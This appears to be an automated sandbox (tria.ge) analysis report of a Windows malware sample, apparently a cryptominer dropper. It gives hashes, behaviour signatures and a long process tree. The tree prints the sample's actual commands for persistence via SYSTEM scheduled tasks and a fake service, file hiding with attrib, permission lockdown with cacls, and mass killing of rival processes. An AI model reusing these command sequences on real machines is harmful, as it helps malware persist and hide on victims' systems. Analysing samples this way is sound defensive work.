Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    150s
  • max time network
    153s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    24/01/2024, 01:00

General

  • Target

    44c11f2419a7650053168843f0c092a45187920bec71ede3d26473472575ee6a.exe

  • Size

    2.5MB

  • MD5

    0692382a5ccf0b0b9406a434352bcd66

  • SHA1

    d67f6d9f3353d712c13a96b00f87f4c9d511e26d

  • SHA256

    44c11f2419a7650053168843f0c092a45187920bec71ede3d26473472575ee6a

  • SHA512

    35d854e0e3cd237bbec6acb3fcbc0692b30333645fff0ed4320853e9c7c1caa6d9d12b0dc6a1c8515126d43695769d334a4a79b4cc1021ca33a7ddaab12805f6

  • SSDEEP

    49152:5wTtKTyEJdyyUa6PrvMrKQHBhzFrBRucp2uBUYYs2aoywX7AqomhDHsH:5atKOMFkxQHBBZOtuBUg2aKXTJMH

Score
9/10

Malware Config

Signatures

  • Contacts a large (17966) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Drops file in Drivers directory 1 IoCs
  • Sets file to hidden 1 TTPs 5 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

  • Stops running service(s) 3 TTPs
  • Deletes itself 1 IoCs
  • Executes dropped EXE 11 IoCs
  • Loads dropped DLL 10 IoCs
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Windows directory 55 IoCs
  • Launches sc.exe 19 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Kills process with WMI 15 IoCs
  • Kills process with taskkill 57 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 11 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\44c11f2419a7650053168843f0c092a45187920bec71ede3d26473472575ee6a.exe
    "C:\Users\Admin\AppData\Local\Temp\44c11f2419a7650053168843f0c092a45187920bec71ede3d26473472575ee6a.exe"
    1⤵
    • Loads dropped DLL
    • Drops file in Windows directory
    • Suspicious use of WriteProcessMemory
    PID:1808
    • C:\Windows\Fonts\Mysql\ctfmon.exe
      "C:\Windows\Fonts\Mysql\ctfmon.exe"
      2⤵
      • Executes dropped EXE
      • Drops file in Windows directory
      PID:2688
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ""C:\Windows\Fonts\Mysql\same.bat" "
        3⤵
        • Drops file in Drivers directory
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:2936
        • C:\Windows\SysWOW64\net.exe
          net stop "MicrosoftMysql"
          4⤵
            PID:1544
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 stop "MicrosoftMysql"
              5⤵
                PID:1688
            • C:\Windows\Fonts\Mysql\svchost.exe
              svchost stop "MicrosoftMysql"
              4⤵
              • Executes dropped EXE
              PID:3048
            • C:\Windows\SysWOW64\sc.exe
              sc delete "MicrosoftMysql"
              4⤵
              • Launches sc.exe
              PID:2136
            • C:\Windows\Fonts\Mysql\svchost.exe
              svchost install MicrosoftMysql "C:\Windows\Fonts\Mysql\cmd.bat"
              4⤵
                PID:2820
              • C:\Windows\SysWOW64\sc.exe
                sc delete "MicrosoftMssql"
                4⤵
                • Launches sc.exe
                PID:1960
              • C:\Windows\Fonts\Mysql\svchost.exe
                svchost stop "MicrosoftFonts"
                4⤵
                • Executes dropped EXE
                PID:3028
              • C:\Windows\SysWOW64\PING.EXE
                ping 127.0.0.1 -n 20
                4⤵
                • Runs ping.exe
                PID:2808
              • C:\Windows\Fonts\Mysql\svchost.exe
                svchost install "MicrosoftMysql" C:\Windows\Fonts\Mysql\cmd.bat
                4⤵
                  PID:2568
                • C:\Windows\Fonts\Mysql\svchost.exe
                  svchost install MicrosoftMysql C:\Windows\Fonts\Mysql\cmd.bat
                  4⤵
                  • Executes dropped EXE
                  PID:1140
                • C:\Windows\SysWOW64\net.exe
                  net stop "MicrosoftMssql"
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2976
                • C:\Windows\Fonts\Mysql\svchost.exe
                  svchost start "MicrosoftMysql"
                  4⤵
                  • Executes dropped EXE
                  PID:2684
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /S /D /c" echo y"
                  4⤵
                    PID:2088
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /create /TN "At1" /TR "C:\Windows\Fonts\Mysql\nei.bat" /SC daily /ST 11:30:00 /RU SYSTEM
                    4⤵
                    • Creates scheduled task(s)
                    PID:1988
                  • C:\Windows\SysWOW64\net.exe
                    net start "MicrosoftMysql"
                    4⤵
                      PID:1832
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /create /TN "At2" /TR "C:\Windows\Fonts\Mysql\wai.bat" /SC daily /ST 01:00:00 /RU SYSTEM
                      4⤵
                      • Creates scheduled task(s)
                      PID:900
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /S /D /c" echo y"
                      4⤵
                        PID:2000
                      • C:\Windows\SysWOW64\attrib.exe
                        attrib +h +s -r C:\Windows\System32\Tasks\At*
                        4⤵
                        • Views/modifies file attributes
                        PID:2052
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /S /D /c" echo y"
                        4⤵
                          PID:2668
                        • C:\Windows\SysWOW64\cacls.exe
                          cacls C:\windows\tasks\At2.job /c /e /t /g everyone:F
                          4⤵
                            PID:1472
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /S /D /c" echo y"
                            4⤵
                              PID:804
                            • C:\Windows\SysWOW64\cacls.exe
                              cacls C:\Windows\System32\Tasks\At2 /c /e /t /g everyone:F
                              4⤵
                                PID:1664
                              • C:\Windows\SysWOW64\cacls.exe
                                cacls C:\Windows\Tasks\HomeGroupProvider /p system:n
                                4⤵
                                  PID:2520
                                • C:\Windows\SysWOW64\cacls.exe
                                  cacls C:\Windows\Tasks\*fost* /p system:n
                                  4⤵
                                    PID:1424
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                    4⤵
                                      PID:2940
                                    • C:\Windows\SysWOW64\cmd.exe
                                      C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                      4⤵
                                        PID:2880
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                        4⤵
                                          PID:2608
                                        • C:\Windows\SysWOW64\cacls.exe
                                          cacls C:\Windows\System32\Tasks\*Group* /p system:n
                                          4⤵
                                            PID:2584
                                          • C:\Windows\SysWOW64\cacls.exe
                                            cacls C:\Windows\System32\Tasks\*ok* /p system:n
                                            4⤵
                                              PID:2648
                                            • C:\Windows\SysWOW64\sc.exe
                                              sc start Schedule
                                              4⤵
                                              • Launches sc.exe
                                              PID:1168
                                            • C:\Windows\SysWOW64\net.exe
                                              net start Schedule
                                              4⤵
                                                PID:2732
                                              • C:\Windows\SysWOW64\taskkill.exe
                                                taskkill /f /im Eternalblue-2.2.0.exe
                                                4⤵
                                                • Kills process with taskkill
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:2020
                                              • C:\Windows\SysWOW64\taskkill.exe
                                                taskkill /f /im Doublepulsar-1.3.1.exe
                                                4⤵
                                                • Kills process with taskkill
                                                PID:2724
                                              • C:\Windows\SysWOW64\cacls.exe
                                                cacls C:\Windows\System32\Tasks\*my* /p system:n
                                                4⤵
                                                  PID:2588
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                  4⤵
                                                    PID:2704
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /f /im one.exe
                                                    4⤵
                                                    • Kills process with taskkill
                                                    PID:1544
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /f /im z.exe
                                                    4⤵
                                                    • Kills process with taskkill
                                                    PID:3008
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                    4⤵
                                                      PID:2640
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /f /im c32.exe
                                                      4⤵
                                                      • Kills process with taskkill
                                                      PID:3068
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /f /im c64.exe
                                                      4⤵
                                                      • Kills process with taskkill
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:1524
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /f /im service.exe
                                                      4⤵
                                                      • Kills process with taskkill
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:2860
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /f /im 32.exe
                                                      4⤵
                                                      • Kills process with taskkill
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:2848
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /f /im 64.exe
                                                      4⤵
                                                      • Kills process with taskkill
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:2772
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /f /im lsazs.exe
                                                      4⤵
                                                      • Kills process with taskkill
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:1076
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /f /im chrome..exe
                                                      4⤵
                                                      • Kills process with taskkill
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:996
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /f /im Cstr.exe
                                                      4⤵
                                                      • Kills process with taskkill
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:2856
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /f /im srvany.exe
                                                      4⤵
                                                      • Kills process with taskkill
                                                      PID:268
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /f /im CPUInfo.exe
                                                      4⤵
                                                      • Kills process with taskkill
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:2796
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /f /im scvsots.exe
                                                      4⤵
                                                      • Kills process with taskkill
                                                      PID:1412
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /f /im acor.exe
                                                      4⤵
                                                      • Kills process with taskkill
                                                      PID:1976
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /f /im lsmosee.exe
                                                      4⤵
                                                      • Kills process with taskkill
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:2960
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /f /im WUDHostServices.exe
                                                      4⤵
                                                      • Kills process with taskkill
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:2256
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /f /im WUDHostService.exe
                                                      4⤵
                                                      • Kills process with taskkill
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:2552
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /f /im lsmose.exe
                                                      4⤵
                                                      • Kills process with taskkill
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:1692
                                                    • C:\Windows\SysWOW64\cacls.exe
                                                      cacls C:\Windows\System32\Tasks\*sa* /p system:n
                                                      4⤵
                                                        PID:2592
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                        4⤵
                                                          PID:2864
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                          4⤵
                                                            PID:2696
                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                            taskkill /f /im 1sass.exe
                                                            4⤵
                                                            • Kills process with taskkill
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:2080
                                                          • C:\Windows\SysWOW64\cacls.exe
                                                            cacls C:\Windows\System32\Tasks\*fost* /p system:n
                                                            4⤵
                                                              PID:2748
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                              4⤵
                                                                PID:2868
                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                taskkill /f /im mssecsvc.exe
                                                                4⤵
                                                                • Kills process with taskkill
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:2128
                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                taskkill /f /im mssecsvr.exe
                                                                4⤵
                                                                • Kills process with taskkill
                                                                PID:580
                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                taskkill /f /im TasksHostServices.exe
                                                                4⤵
                                                                • Kills process with taskkill
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:1172
                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                taskkill /f /im TasksHostService.exe
                                                                4⤵
                                                                • Kills process with taskkill
                                                                PID:2500
                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                taskkill /f /im crss.exe
                                                                4⤵
                                                                • Kills process with taskkill
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:2440
                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                taskkill /f /im svsohst.exe
                                                                4⤵
                                                                • Kills process with taskkill
                                                                PID:2480
                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                taskkill /f /im seser.exe
                                                                4⤵
                                                                • Kills process with taskkill
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:828
                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                taskkill /f /im msinfo.exe
                                                                4⤵
                                                                • Kills process with taskkill
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:1060
                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                taskkill /f /im taskmgr.exe
                                                                4⤵
                                                                • Kills process with taskkill
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:2008
                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                taskkill /f /im csrs.exe
                                                                4⤵
                                                                • Kills process with taskkill
                                                                PID:1988
                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                taskkill /f /im path.exe
                                                                4⤵
                                                                • Kills process with taskkill
                                                                PID:1224
                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                taskkill /f /im spoolsrv.exe
                                                                4⤵
                                                                • Kills process with taskkill
                                                                PID:1952
                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                taskkill /f /im svschost.exe
                                                                4⤵
                                                                • Kills process with taskkill
                                                                PID:3056
                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                taskkill /f /im mscteui.exe
                                                                4⤵
                                                                • Kills process with taskkill
                                                                PID:556
                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                taskkill /f /im TrueServiceHost.exe
                                                                4⤵
                                                                • Kills process with taskkill
                                                                PID:2312
                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                taskkill /f /im ServicesMgrHost.exe
                                                                4⤵
                                                                • Kills process with taskkill
                                                                PID:1156
                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                taskkill /f /im GoogleCdoeUpdate.exe
                                                                4⤵
                                                                • Kills process with taskkill
                                                                PID:1664
                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                taskkill /f /im TrustedHostex.exe
                                                                4⤵
                                                                • Kills process with taskkill
                                                                PID:2024
                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                taskkill /f /im svhost.exe
                                                                4⤵
                                                                • Kills process with taskkill
                                                                PID:2368
                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                taskkill /f /im WUDFHosts.exe
                                                                4⤵
                                                                • Kills process with taskkill
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:1604
                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                taskkill /f /im scvhost.exe
                                                                4⤵
                                                                • Kills process with taskkill
                                                                PID:1696
                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                taskkill /f /im csrse.exe
                                                                4⤵
                                                                • Kills process with taskkill
                                                                PID:2900
                                                              • C:\Windows\SysWOW64\net.exe
                                                                net stop "mssecsvc2.0"
                                                                4⤵
                                                                  PID:2904
                                                                • C:\Windows\SysWOW64\sc.exe
                                                                  sc stop "dbuxbr"
                                                                  4⤵
                                                                  • Launches sc.exe
                                                                  PID:2592
                                                                • C:\Windows\SysWOW64\sc.exe
                                                                  sc stop "mssecsvc2.1"
                                                                  4⤵
                                                                  • Launches sc.exe
                                                                  PID:2660
                                                                • C:\Windows\SysWOW64\sc.exe
                                                                  sc config "dbuxbr" start= disabled
                                                                  4⤵
                                                                  • Launches sc.exe
                                                                  PID:1924
                                                                • C:\Windows\SysWOW64\sc.exe
                                                                  sc config "lbpuamoqhpoqju171" start= disabled
                                                                  4⤵
                                                                  • Launches sc.exe
                                                                  PID:2280
                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                  taskkill /f /im mssecsvr.exe
                                                                  4⤵
                                                                  • Kills process with taskkill
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:2724
                                                                • C:\Windows\SysWOW64\sc.exe
                                                                  sc config "mssecsvc2.0" start= disabled
                                                                  4⤵
                                                                  • Launches sc.exe
                                                                  PID:1688
                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                  taskkill /f /im mssecsvc.exe
                                                                  4⤵
                                                                  • Kills process with taskkill
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  • Suspicious use of WriteProcessMemory
                                                                  PID:1544
                                                                • C:\Windows\SysWOW64\sc.exe
                                                                  sc config "mssecsvc2.1" start= disabled
                                                                  4⤵
                                                                  • Launches sc.exe
                                                                  PID:1072
                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                  taskkill /f /im tasksche.exe
                                                                  4⤵
                                                                  • Kills process with taskkill
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:3008
                                                                • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                  Wmic Process Where "Name='svchost.exe' And ExecutablePath='C:\\Windows\\Fonts\\Microsoft\\svchost.exe'" Call Terminate
                                                                  4⤵
                                                                  • Kills process with WMI
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:3068
                                                                • C:\Windows\SysWOW64\sc.exe
                                                                  sc config "fastuserswitchingcompatibility" start= disabled
                                                                  4⤵
                                                                  • Drops file in Windows directory
                                                                  • Launches sc.exe
                                                                  • Suspicious use of WriteProcessMemory
                                                                  PID:2688
                                                                • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                  Wmic Process Where "Name='taskhost.exe' And ExecutablePath='C:\\Windows\\Fonts\\Microsoft\\taskhost.exe'" Call Terminate
                                                                  4⤵
                                                                  • Executes dropped EXE
                                                                  • Kills process with WMI
                                                                  PID:2820
                                                                • C:\Windows\SysWOW64\sc.exe
                                                                  sc config "tjuldl" start= disabled
                                                                  4⤵
                                                                  • Launches sc.exe
                                                                  PID:2296
                                                                • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                  Wmic Process Where "Name='mssecsvr.exe' And ExecutablePath='C:\\Windows\\mssecsvr.exe'" Call Terminate
                                                                  4⤵
                                                                  • Executes dropped EXE
                                                                  • Kills process with WMI
                                                                  PID:2568
                                                                • C:\Windows\SysWOW64\sc.exe
                                                                  sc stop "lbpuamoqhpoqju171"
                                                                  4⤵
                                                                  • Launches sc.exe
                                                                  PID:2716
                                                                • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                  Wmic Process Where "Name='tasksche.exe' And ExecutablePath='C:\\Windows\\tasksche.exe'" Call Terminate
                                                                  4⤵
                                                                  • Kills process with WMI
                                                                  PID:2472
                                                                • C:\Windows\SysWOW64\sc.exe
                                                                  sc stop "mssecsvc2.0"
                                                                  4⤵
                                                                  • Launches sc.exe
                                                                  PID:1912
                                                                • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                  Wmic Process Where "Name='mssecsvc.exe' And ExecutablePath='C:\\WINDOWS\\mssecsvc.exe'" Call Terminate
                                                                  4⤵
                                                                  • Kills process with WMI
                                                                  PID:2148
                                                                • C:\Windows\SysWOW64\sc.exe
                                                                  sc stop "fastuserswitchingcompatibility"
                                                                  4⤵
                                                                  • Launches sc.exe
                                                                  PID:2864
                                                                • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                  Wmic Process Where "Name='tasksche.exe' And ExecutablePath='C:\\Windows\\tasksche.exe'" Call Terminate
                                                                  4⤵
                                                                  • Kills process with WMI
                                                                  PID:2224
                                                                • C:\Windows\SysWOW64\sc.exe
                                                                  sc stop "tjuldl"
                                                                  4⤵
                                                                  • Launches sc.exe
                                                                  PID:2636
                                                                • C:\Windows\SysWOW64\net.exe
                                                                  net stop "lbpuamoqhpoqju171"
                                                                  4⤵
                                                                    PID:2752
                                                                  • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                    Wmic Process Where "Name='mssecsvr.exe' And ExecutablePath='C:\\WINDOWS\\mssecsvr.exe'" Call Terminate
                                                                    4⤵
                                                                    • Kills process with WMI
                                                                    PID:2928
                                                                  • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                    Wmic Process Where "Name='mssecsvc.exe' And ExecutablePath='C:\\WINDOWS\\mssecsvc.exe'" Call Terminate
                                                                    4⤵
                                                                    • Kills process with WMI
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:268
                                                                  • C:\Windows\SysWOW64\cacls.exe
                                                                    cacls C:\Windows\mssecsvr.exe /p system:n
                                                                    4⤵
                                                                      PID:1456
                                                                    • C:\Windows\SysWOW64\cacls.exe
                                                                      cacls C:\Windows\tasksche.exe /p system:n
                                                                      4⤵
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:1976
                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                      taskkill /f /im conhosts.exe
                                                                      4⤵
                                                                      • Kills process with taskkill
                                                                      PID:1480
                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                      taskkill /f /im lsmose.exe
                                                                      4⤵
                                                                      • Kills process with taskkill
                                                                      PID:2120
                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                      taskkill /f /im lsmosee.exe
                                                                      4⤵
                                                                      • Kills process with taskkill
                                                                      PID:1528
                                                                    • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                      Wmic Process Where "Name='conhosts.exe' And ExecutablePath='C:\\Windows\\Temp\\conhosts.exe'" Call Terminate
                                                                      4⤵
                                                                      • Kills process with WMI
                                                                      PID:2076
                                                                    • C:\Windows\SysWOW64\cacls.exe
                                                                      cacls C:\Windows\qeriuwjhrf /p system:n
                                                                      4⤵
                                                                        PID:456
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                        4⤵
                                                                          PID:1768
                                                                        • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                          Wmic Process Where "Name='conhost.exe' And ExecutablePath='C:\\Windows\\Temp\\conhost.exe'" Call Terminate
                                                                          4⤵
                                                                          • Kills process with WMI
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:2324
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                          4⤵
                                                                            PID:796
                                                                          • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                            Wmic Process Where "Name='lsmosee.exe' And ExecutablePath='C:\\Windows\\help\\lsmosee.exe'" Call Terminate
                                                                            4⤵
                                                                            • Kills process with WMI
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:580
                                                                          • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                            Wmic Process Where "Name='lsmose.exe' And ExecutablePath='C:\\Windows\\help\\lsmose.exe'" Call Terminate
                                                                            4⤵
                                                                            • Kills process with WMI
                                                                            PID:2360
                                                                          • C:\Windows\SysWOW64\cacls.exe
                                                                            cacls C:\Windows\mssecsvc.exe /p system:n
                                                                            4⤵
                                                                              PID:1940
                                                                            • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                              Wmic Process Where "Name='lsmosee.exe' And ExecutablePath='C:\\Windows\\debug\\lsmosee.exe'" Call Terminate
                                                                              4⤵
                                                                              • Kills process with WMI
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:2500
                                                                            • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                              Wmic Process Where "Name='lsmose.exe' And ExecutablePath='C:\\Windows\\debug\\lsmose.exe'" Call Terminate
                                                                              4⤵
                                                                              • Kills process with WMI
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:2480
                                                                            • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                              Wmic Process Where "Name='conime.exe' And ExecutablePath='C:\\Progra~1\\Common~1\\conime.exe'" Call Terminate
                                                                              4⤵
                                                                              • Kills process with WMI
                                                                              PID:1992
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                              4⤵
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:1412
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                              4⤵
                                                                                PID:1468
                                                                              • C:\Windows\SysWOW64\attrib.exe
                                                                                attrib +s +h +r C:\WINDOWS\Web\*.vbs
                                                                                4⤵
                                                                                • Sets file to hidden
                                                                                • Views/modifies file attributes
                                                                                PID:2556
                                                                              • C:\Windows\SysWOW64\attrib.exe
                                                                                attrib +s +h +r C:\Windows\Temp\conhost.exe
                                                                                4⤵
                                                                                • Sets file to hidden
                                                                                • Views/modifies file attributes
                                                                                PID:900
                                                                              • C:\Windows\SysWOW64\cacls.exe
                                                                                cacls C:\Windows\help\lsmosee.exe /p system:n
                                                                                4⤵
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                PID:1988
                                                                              • C:\Windows\SysWOW64\cacls.exe
                                                                                cacls C:\Windows\help\lsmose.exe /p system:n
                                                                                4⤵
                                                                                  PID:2164
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                  4⤵
                                                                                    PID:2452
                                                                                  • C:\Windows\SysWOW64\cacls.exe
                                                                                    cacls C:\Windows\debug\lsmose.exe /p system:n
                                                                                    4⤵
                                                                                      PID:1744
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                      4⤵
                                                                                        PID:1228
                                                                                      • C:\Windows\SysWOW64\cacls.exe
                                                                                        cacls C:\Windows\Temp\*.exe /p system:n
                                                                                        4⤵
                                                                                          PID:2116
                                                                                        • C:\Windows\SysWOW64\cacls.exe
                                                                                          cacls C:\Windows\debug\xmrstak_opencl_backend.dll /p system:n
                                                                                          4⤵
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:2024
                                                                                        • C:\Windows\SysWOW64\attrib.exe
                                                                                          attrib -r -h -s C:\Documents and Settings\All Users\Application Data\clr_optimization_v4.0.30318_64
                                                                                          4⤵
                                                                                          • Views/modifies file attributes
                                                                                          PID:2676
                                                                                        • C:\Windows\SysWOW64\cacls.exe
                                                                                          cacls C:\ProgramData\clr_optimization_v4.0.30318_64\svchost.exe /c /e /t /g system:F
                                                                                          4⤵
                                                                                            PID:1616
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                            4⤵
                                                                                              PID:2436
                                                                                            • C:\Windows\SysWOW64\cacls.exe
                                                                                              cacls C:\ProgramData\Microsoft\clr_optimization_v4.0.30318_64\csrss.exe /c /e /t /g system:F
                                                                                              4⤵
                                                                                                PID:2268
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                4⤵
                                                                                                  PID:1696
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                  4⤵
                                                                                                    PID:2616
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                    4⤵
                                                                                                      PID:1532
                                                                                                    • C:\Windows\SysWOW64\cacls.exe
                                                                                                      cacls C:\ProgramData\Microsoft\clr_optimization_v4.0.30318_64 /c /e /t /g everyone:F
                                                                                                      4⤵
                                                                                                        PID:2596
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                        4⤵
                                                                                                          PID:2748
                                                                                                        • C:\Windows\SysWOW64\cacls.exe
                                                                                                          cacls C:\Documents and Settings\All Users\Application Data\clr_optimization_v4.0.30318_64 /c /e /t /g system:F
                                                                                                          4⤵
                                                                                                            PID:2864
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                            4⤵
